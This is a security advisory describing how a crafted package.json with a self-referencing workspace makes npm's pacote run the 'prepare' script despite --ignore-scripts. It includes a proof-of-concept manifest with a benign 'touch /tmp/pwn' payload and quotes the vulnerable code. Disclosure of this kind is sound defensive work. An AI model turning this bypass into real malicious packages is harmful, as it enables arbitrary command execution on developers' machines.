An attacker can craft a malicious package.json file that bypasses the --ignore-scripts security flag. This leads to arbitrary system command execution when a victim executes npm install -–ignore-scripts on the malicious package.
{
"name": "rce-test",
"dependencies": {
},
"workspaces": [
"."
],
"scripts": {
"prepare": "touch /tmp/pwn"
}
}When a local directory is listed as a dependency, pacote executes the prepare script even if the --ignore-scripts flag is set. This is because no check is present:
return runScript({
pkg: mani,
event: 'prepare',
path: this.resolved,
stdio,
banner,
env: {
npm_package_resolved: this.resolved,
npm_package_integrity: this.integrity,
npm_package_json: resolve(this.resolved, 'package.json'),
},
})
})
Summary
An attacker can craft a malicious package.json file that bypasses the --ignore-scripts security flag. This leads to arbitrary system command execution when a victim executes npm install -–ignore-scripts on the malicious package.
Severity
Moderate - This vulnerability bypasses the
--ignore-scriptsoption intended to prevent malicious users from executingarbitrary build scripts.
Proof of Concept
{ "name": "rce-test", "dependencies": { }, "workspaces": [ "." ], "scripts": { "prepare": "touch /tmp/pwn" } }Further Analysis
When a local directory is listed as a dependency, pacote executes the prepare script even if the --ignore-scripts flag is set. This is because no check is present:
https://github.dev/npm/pacote/blob/a08a9a39bae0ddd73605b0d06bd227897d2f9567/lib/dir.js#L48-L60
Timeline
Date reported: 02/20/2023
Date fixed:
Date disclosed: 05/21/2023